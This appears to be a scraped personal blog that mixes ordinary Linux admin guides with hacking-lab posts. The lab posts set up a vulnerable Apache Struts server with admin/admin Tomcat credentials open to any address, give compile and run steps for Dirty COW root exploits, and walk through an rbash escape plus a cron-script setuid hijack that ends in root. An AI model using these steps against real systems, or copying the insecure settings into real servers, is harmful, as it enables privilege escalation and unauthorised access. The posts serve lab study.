Tags: Apache Struts / Apache Struts vulnerable server / CVE-2017-5638 / Exploits / Hacking And Security / Hacking Server / Hacking Tools / How I Hacked / showcase.action / unknowndevice64

Apache Struts with CVE-2017-5638 - set up a vulnerable server

- Friday 22 September 2017 No Comments

Apache Struts is a popular server-side Java-based framework used to make web applications. First we'll set up a vulnerable server, and then exploit it with Metasploit.

Step1: Installing Java
Install Oracle Java JDK 8 On your host system, in a Web browser, go here: http://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html
Download jdk-8u144-linux-x64.tar.gz copy to /mnt Folder
cd /tmp
tar -xvf jdk-8u144-linux-x64.tar.gz
sudo mkdir -p /usr/lib/jvm
    sudo mv ./jdk1.8.0* /usr/lib/jvm/
    sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_144/bin/java" 1
    sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_144/bin/javac" 1
    sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_144/bin/javaws" 1
    sudo chmod a+x /usr/bin/java
    sudo chmod a+x /usr/bin/javac
    sudo chmod a+x /usr/bin/javaws
    sudo chown -R root:root /usr/lib/jvm/jdk1.8.0_144
    sudo update-alternatives --config java
    sudo update-alternatives --config javac
    sudo update-alternatives --config javaws

If you see "nothing to configure" that's OK.
java -version

Step2: Installing Tomcat
 Ubuntu server, execute these commands:
    cd /tmp
    wget http://apache.mirrors.hoobly.com/tomcat/tomcat-9/v9.0.0.M26/bin/apache-tomcat-9.0.0.M26.tar.gz
    tar xvzf apache-tomcat-9.0.0.M26.tar.gz
    sudo mkdir /usr/local/tomcat
    sudo mv apache-tomcat-9.0.0.M26/* /usr/local/tomcat
Ubuntu server, execute these commands:
    cd
    nano .bashrcAdd this line to the bottom of the file, as shown below.
    export JAVA_HOME=/usr/lib/jvm/jdk1.8.0_144Save the file with Ctrl+X, Y, Enter.
Ubuntu server, execute this command to set the new environment variable:
    source .bashrcUbuntu server, execute this command to start Tomcat:
    /usr/local/tomcat/bin/startup.shTomcat starts
 On your host system, in a Web browser, open this URL, replacing the IP address with the IP address of your Ubuntu server.
http://System_IP:8080/
You see an Apache Tomcat page.

Step3: Install unzip
Ubuntu server, execute these commands:
    sudo apt update
    sudo apt install unzip
 
Step4: Install Struts2 (Old, Vulnerable Version)
Ubuntu server, execute these commands:
    cd
    wget http://archive.apache.org/dist/struts/2.5.10/struts-2.5.10-all.zip
    unzip struts-2.5.10-all.zip
    mv struts-2.5.10 struts2
 
Step5: Install Maven
 Ubuntu server, execute these commands:
    cd /tmp
    wget http://mirror.metrocast.net/apache/maven/maven-3/3.5.0/binaries/apache-maven-3.5.0-bin.tar.gz
    sudo tar xvzf apache-maven*.tar.gz -C /opt/
    cd
    nano .bashrc
Add this line to the bottom of the file, as shown below.
    export PATH=$PATH:/opt/apache-maven-3.5.0/bin
 Save the file with Ctrl+X, Y, Enter.
Ubuntu server, execute this command to set the new environment variable:
    source .bashrc
In the SSH session controlling your Ubuntu server, execute this command:
    mvn -version
You see a version number
Step5: Creating a Project
 Ubuntu server, execute these commands:
    cd
    mvn archetype:generate \
     -DgroupId=com.tutorialforlinux \
     -DartifactId=myWebApp \
     -DarchetypeArtifactId=maven-archetype-webapp
Many pages of "Downloading" messages scroll by.
When you see the message: "Define value for property 'version' 1.0-SNAPSHOT: :", press Enter.
When you see the message: "Y: :", press Enter.
You see a "BUILD SUCCESS" message

Ubuntu server, execute these commands:
    cd myWebApp
    nano pom.xml
The file opens, as shown below. This is an XML configuration file.
 At the bottom of the file, in the "build" section, change myWebApp to basic_struts,
    <build>
      <finalName>basic_struts</finalName>
    </build>
 At the bottom of the file, in the "dependencies" section, add a new "dependency" section, Include in the <dependencies> Section:

    <dependency>
      <groupId>org.apache.struts</groupId>
      <artifactId>struts2-core</artifactId>
      <version>2.5.10</version>
    </dependency>
 Save the file with Ctrl+X, Y, Enter.

To make your web app,Ubuntu server, execute this command:
    mvn clean package
Many pages of "Downloading" messages scroll by, ending with a green "BUILD SUCCESS" message
 This has created a "war" file, ready to deploy, at this location:
~/myWebApp/target/basic_struts.war
However, we don't actually need that application. We'll deploy a different one later.

Step6: Comfiguring Web-Based Deployment
Ubuntu server, execute these commands:
    cd
    nano .bashrc

Add this line to the bottom of the file, as shown below.
    export CATALINA_HOME=/usr/local/tomcat

Save the file with Ctrl+X, Y, Enter.
Ubuntu server, execute this command to set the new environment variable:
    source .bashrc
Now we need to adjust the tomcat configuration to allow administration from remote addresses.
 Ubuntu server, execute this command:
    sudo nano $CATALINA_HOME/conf/tomcat-users.xml
The "tomcat-users" section contain only comments,
 Insert these lines into the "tomcat-users" section,
    <role rolename="manager-gui" />
     <user username="admin" password="admin" roles="manager-gui"/>

Save the file with Ctrl+X, Y, Enter.
Ubuntu server, execute this command:
    sudo nano $CATALINA_HOME/conf/Catalina/localhost/manager.xml

Insert these lines into the file, as shown below.

    <Context privileged="true" antiResourceLocking="false"
             docBase="${catalina.home}/webapps/manager">
        <Valve className="org.apache.catalina.valves.RemoteAddrValve" allow="^.*$" />
    </Context>
 Save the file with Ctrl+X, Y, Enter.
 Ubuntu server, execute these commands to restart Tomcat. It may take a few minutes to shut down the first time--that's OK.
    sudo $CATALINA_HOME/bin/shutdown.sh
    sudo $CATALINA_HOME/bin/startup.sh
Tomcat restarts,

Spep 7: Opening the Web-Based Administration Page
On your host system, in a Web browser, open this URL, replacing the IP address with the IP address of your Ubuntu server.

http://IP:8080/manager
A box pops up asking for credentials. Enter these credentials:
Username: admin
Password: admin

In the "Tomcat Web Application Manager" page, scroll down to the "Deploy" section

Step 8: Downloading a Vulnerable Web App
On your host system, in a Web browser, go to:
https://github.com/nixawk/labs/blob/master/CVE-2017-5638/struts2_2.3.15.1-showcase.war

On the right side, click the Download button.
You get a file named struts2_2.3.15.1-showcase.war

Step9: Deploying the Vulnerable Web App
In the "Tomcat Web Application Manager" page, in the "Deploy" section, in the "WAR file to deploy" section, click the "Choose File" button.

Navigate to your Downloads folder and double-click the struts2_2.3.15.1-showcase.war file.

Click the Deploy button.

The Tomcat page now shows the /struts2_2.3.15.1-showcase application at the bottom of the Applications section, as shown below
 Click /struts2_2.3.15.1-showcase.
The "Struts2 Showcase" page appears, as shown below.

Tags: Linux / Linux Customizing / Linux Mint / Troubleshoot

How to Customize Linux Mint Login Screen

- Saturday 12 November 2016 No Comments

Hello Friends, today i am going to explain How to Customize Linux Mint Login Screen.
In linux mint it’s easy to change every aspect of the login screen, from what buttons appear, to the order that the names (if any) appear, to the background image, and more using theme or by yourself.
there are many themes are already available out there, but i am going to explain how to edit or make own login theme for linux mint.
To start, you first should check out the themes for Login Screens that come with Mint, since there are many good ones right out of the box. To do that, just click on:

Menu -> System Settings -> Login Window.

If you find one that’s close, then you can copy that theme from
/usr/share/mdm/html-themes/

to a subdirectory in your Home, Now that you’re editing your own copy of the theme, you can modify the theme.info file to reflect it’s your own info. Then, tweak index.html & theme.css to taste. They’re usually pretty well commented, so you should be able to see what you’re looking to modify if you read through these files. Of course, now that you’re working on a copy of that theme, you can also replace the existing images with ones you prefer. (I like to keep them the exact same size as their replacements to make the change as bug-free as possible.)


When you’re done making your changes, go up a directory, and then right-click the subdirectory containing your theme’s files & folders, and choose “Compress…” (*.tar.gz) click OK.

Now, head back over to the Login Window Preferences in System Settings, and click the “+” icon at the upper-right to add a new theme. Select your compressed file and you’re done!

As long as you have some basic HTML knowledge this couldn’t be easier, once you know where to look!

You can Download My Theme From This LINK.

Leave a comment below :) Thanks..!

Tags: deactivating root / enable root login / Linux / Server And Hosting / Troubleshoot

How to activate and deactivate root in ubuntu server

- No Comments

Hi, today i am going to explain about How to activate and deactivate root in ubuntu server
Enabling root password:
To enable root logins first you have to set a password for the root account and then unlock the locked root account. If you don't set a password for the root account the passwd command will return

passwd: unlocking the password would result in a passwordless account. 
So, first execute in a terminal
sudo passwd root

you will be prompted for a new Unix password. Write it twice (second for confirmation).

Then execute
sudo passwd -u root

to unlock the account. This should return
passwd: password expiry information changed

Reverting back:
If you want to disable root account in Ubuntu you need to lock the root account by using the following command
sudo passwd -l root

Tags: Copy-on-write (COW) Exploit / CVE-2016-5195 / Exploits / Hacking And Security / Hacking Server / Linux

Copy-on-write (COW) Exploit (CVE-2016-5195) Live Demo

- Saturday 5 November 2016 No Comments

According to "Linus Torvalds" This is an ancient bug that was actually attempted to be fixed once (badly) by me eleven years ago in commit 4ceb5db9757a ("Fix get_user_pages() race for write access") but that was then undone due to problems on s390 by commit f33ea7f404e5 ("fix get_user_pages bug").
What is Copy-on-write (COW)?
A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system." (RH)
How to use this Exploit?
please watch above video for live demo.
Exploit1: Write content on real only permission on file owned by root
Download the exploit code using wget:
First Exploit Code: Click Here
Compile This Code Using:
gcc -pthread dirtyc0w.c -o ud64_exploit
Now Run This Exploit:
./ud64_exploit root_file new_text_string
Exploit2:To Get Root by Local Privilege Escalation
Download the exploit code using wget:
Second Exploit Code: Click Here
Modify and use correct payload as per your test server (x86 or x64)!
by (un)commenting exploit code.
Compile This Code Using:
gcc -pthread cowroot.c -o ud64_exploit
Now Run This Exploit:
./ud64_exploit
check using:
whoami or id
Fix: Source
+/*
+ * FOLL_FORCE can write to even unwritable pte's, but only
+ * after we've gone through a COW cycle and they are dirty.
+ */
+static inline bool can_follow_write_pte(pte_t pte, unsigned int flags)
+{
+ return pte_write(pte) ||
+ ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));
+}
+
Thanks for reading, please comment if you need any other exploit live demo. :)
./unknowndevice64

Tags: Linux / Linux Troubleshooting / Server And Hosting / Static IP Configuration / Static IP in Linux / Troubleshoot

Manual Static IP Address Configuration in Linux Server by Terminal

- Sunday 4 September 2016 No Comments

hello friends,
today i am going to write about how to manually configure static IP address in Linux Server using Terminal.
This is useful when you need a bridge connection in virtual machine, as well as working on server.
First of all login on server using terminal or/and ssh.
You can Check Current IP Configuration by below command in terminal:
ifconfig

The IP Configuration stored in interfaces file stored in:
/etc/network/interfaces

change to above directory:
cd /etc/network/

Before changing anything make a backup of interfaces file:
sudo cp interfaces interfaces.ud64

Now the most important part find below line
auto eth0
iface eth0 inet dhcp
and replace by your IP details for exaple:
auto eth0
iface eth0 inet static
address 192.168.3.166
netmask 255.255.0.0
gateway 192.168.3.1
dns-nameservers 8.8.8.8

Now its time to restart Ethernet interface:
Stop the network interface eth0:
ifdown eth0

Start the network interface eth0:
ifup eth0

Don't confuse with the following command, which restarts all the networks services :
/etc/init.d/networking restart

To see your various network interfaces, use the command:
/sbin/ifconfig -a

Now check your IP using ifconfig, you will get new static IP.
if you have any doubt or problem you can leave a comment below, i love to solve.

Tags: Exploits / Got Wurzel / Hacking And Security / hacking lab / Hacking Server / Linux / linux exploit / Linux Troubleshooting / privilege escalation / root server

How to escape root privilege in linux and root

- Saturday 6 August 2016 No Comments

I SSH the system with restricted1, after login i found I was in a restricted bash shell (rbash).
I found that several commands were not allowed, and / character was allowed in arguments but not in the command name.
So I can’t call any commands by path.
so i have used below command to check files, and their permission.
ls -la ./bin

I found that i have write permission to ping file.
and why there is tee command ? (its a hint)
so i have used tee command to write bash into ping using below command.
echo '#!' | tee ./bin/ping
echo '/bin/bash' | tee -a ./bin/ping

Then I run the ping command and i escaped from restricted shell.
I am no longer in a restricted of shell.
I set my ENV path so I don’t have to specify full paths to programs:
export PATH=$PATH:/bin
export PATH=$PATH:/usr/bin

After performing lots of vulnerability test i found that there was a cron job running, so i have switch to
cd /etc/cron.minutely/mtr

but the file had no write permission, but after checking the file using
cat /etc/cron.minutely/mtr

that file was including another file from,
/usr/bin/mtr-check

and had write permission permission to check run,
ls -la /usr/bin/mtr-check

so i had alter the content from below code, using nano editor.
cp /bin/sh /home/restricted1/ud64 && chmod 4755 /home/restricted1/ud64

cron will copy /bin/sh to my directory (restricted1) and setting the s flag using chmod 4755 (so i had setuid upon execution).
when i switch to /home/restricted1, i found ud64, after performing
./ud64

i got root. to check performed
whoami

and finally to read content used below line,
cat /root/secret.txt

hope this tutorial will help you to understand the security risk associated with vulnerability of improper file permission.
Thanks.. :) ./unknowndevice64

Tags: PLESK And cPanel / PLESK to cPanel

How to transfer old emails from PLESK to cPanel

- Wednesday 8 June 2016 3 Comments

hello readers, one friend asked How to transfer old emails from PLESK to cPanel, hence i am writing this page.
he has transferred the whole website from PLESK TO cPanel, hence he was asking the same.
Before the solution i wanna tell just for knowledge that email messages are stored on PLESK on this location:
# /var/qmail/
now you can use below steps "to transfer email email messages from PLESK to cPanel"
We can fetch email from PLESK server and have it imported into cPanel.
STEP 1: Simply login to your cPanel
STEP 2: Access your webmail and access Horde
Once logged in, on the left hand side, click OPTIONS then Mail
On the center of the screen under “Message Options” click “Fetch Mail”
STEP 3: Create a new account, enter your details from your email account located on your PLESK server (for the incoming/outgoing servers, use your PLESK server hostname)
Email will then begin to be downloaded into your cPanel inbox.
hope this article will help to solve this problem, if not please leave a comment :)

Tags: Hacking And Security / How to use DMITRY / Information Gathering / Kali Linux

How To Use DMITRY in Kali Linux for Information Gathering

- Wednesday 4 May 2016 No Comments

hello friends, this is my first but not last, kali linux tutorial of information gathering tool DMITRY.
How to use dmitry ?
Open Terminal in Kali Linux and Type dmitry
you will see following options with dmitry.
Usage: dmitry [-winsepfb] [-t 0-9] [-o %host.txt] host
-o Save output to %host.txt or to file specified by -o file
-i Perform a whois lookup on the IP address of a host
-w Perform a whois lookup on the domain name of a host
-n Retrieve Netcraft.com information on a host
-s Perform a search for possible subdomains
-e Perform a search for possible email addresses
-p Perform a TCP port scan on a host
* -f Perform a TCP port scan on a host showing output reporting filtered ports
* -b Read in the banner received from the scanned port
* -t 0-9 Set the TTL in seconds when scanning a TCP port ( Default 2 )
*Requires the -p flagged to be passed
For whois Lookup of google you can use following command in Terminal
dmitry -w -o file google.com
-w to perform whois and -o to save output into file.
for more just play below video :)